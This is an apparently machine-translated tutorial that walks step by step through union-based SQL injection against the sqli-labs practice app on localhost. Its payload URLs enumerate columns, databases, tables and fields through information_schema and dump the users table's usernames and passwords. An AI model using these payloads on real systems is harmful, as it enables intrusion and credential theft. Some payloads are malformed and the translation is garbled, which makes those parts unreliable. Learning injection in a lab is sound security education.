Shulou(Shulou.com)05/31 Report--

This article will explain in detail the sample analysis of manual injection of sql injection, Xiaobian thinks it is quite practical, so share it with you for a reference, I hope you can gain something after reading this article.

For convenience of explanation, we still use the previous digital injection point as an example to illustrate.

Total number of fields obtained

In the previous introduction, we already know that the file http://localhost/sqlliabs/Less-2/? id=1id is an injection point.

SQL statements in the background are written roughly as follows

select username,password,[....] from table where id=userinput

Then we determine the number of fields to select by using the order by statement.

Payload becomes:

http://localhost/sqlilabs/Less-2/? id=1 order by 1/2/3/4....

When using order by 4, the program has an error, so the total number of select fields is 3.

Get the display bit

The fields selected from select will be displayed on the page. Next, we will determine which fields are displayed.

Use the following payload(either) to determine.

http://localhost/sqlilabs/Less-2/? id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/? id=1 and 1=2 union select 1,2,3

When using payloads such as above, the page appears as follows:

As you can see from the above page display, the information displayed in the page is the second and third bits.

search library

After knowing the display bit, we can display the information we want to know through the display bit, such as the version of the database, user information, etc. Then we can use the following payload to know the relevant information.

http://localhost/sqlilabs/Less-2/? id=-1 union select 1,version(),database()

At this time, the page is displayed as:

You can see that the version information of the database and the database information currently in use appear on the page.

Then we know the names of all the databases in the database in this way.

Payload is as follows:

http://localhost/sqlilabs/Less-2/? id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #Get the first library name http://localhost/sqlliabs/Less-2/? id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #Get the second library name...

lookup table name

Since database() returns the database name used by the current web application, we use database() to query all table information. Of course in the previous step. We also know that the current database is security.

Then we construct the payload as follows:

http://localhost/sqlilabs/Less-2/? id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

This gives us the names of all the tables in the current database. The page returned results:

So we know that there are four tables in the current database, namely emails,referers,uagents,users.

Search list

After knowing the table name, we can use information_schema.columns to get all the fields in the current table according to the table name.

Payload is as follows:

http://localhost/sqlilabs/Less-2/? id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'http://localhost/sqlilabs/Less-2/? id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 0x7573657273 (hex of users)

The page displays the following results:

From this statement, we know that there are USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password fields in the users table. But when I tested it locally, there was a problem with this. In fact, in the users table of the security database, there were only three fields: id,username and password. The other fields were the field names of the users table in other databases.

From the payload above, we can also know the field names in emails,referers,uagents.

But sometimes the background code may only use the where clause, then this time can not get the column name through the information_schema.coumns, this time can only be based on your own years of hacking experience to guess. Guess the solution method is also relatively simple, using the exists clause can guess. Assuming we already know the table name (guessing the table name is also done using the exists clause).

The answer is as follows:

http://localhost/sqlilabs/Less-2/? id=1 and exists(select uname from users)

The main sentence is exists(select the column name to guess from users). If the uname column name does not exist in the users table, the page does not display the content or the sql error statement appears directly.

As follows:

The following is a list of the fields that exist in the users table.

http://localhost/sqlilabs/Less-2/? id=1 and exists(select username from users)

Guess there is a username column in the users table, the above statement program can return the result normally, then the lifetime does exist in the users table username column name.

Torco

After knowing all the table names and field names of the current database, we can dump all the information in the database. For example, we download all the data from the current users table.

You can use the following payload:

http://localhost/sqlilabs/Less-2/? id=-1 union select 1,group_concat(username,password),3 from users

You can get all the username and password data in the users table, and you can also get the data in other tables in this way.

About "sql injection of manual injection of sample analysis" this article is shared here, I hope the above content can be of some help to everyone, so that you can learn more knowledge, if you think the article is good, please share it to let more people see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.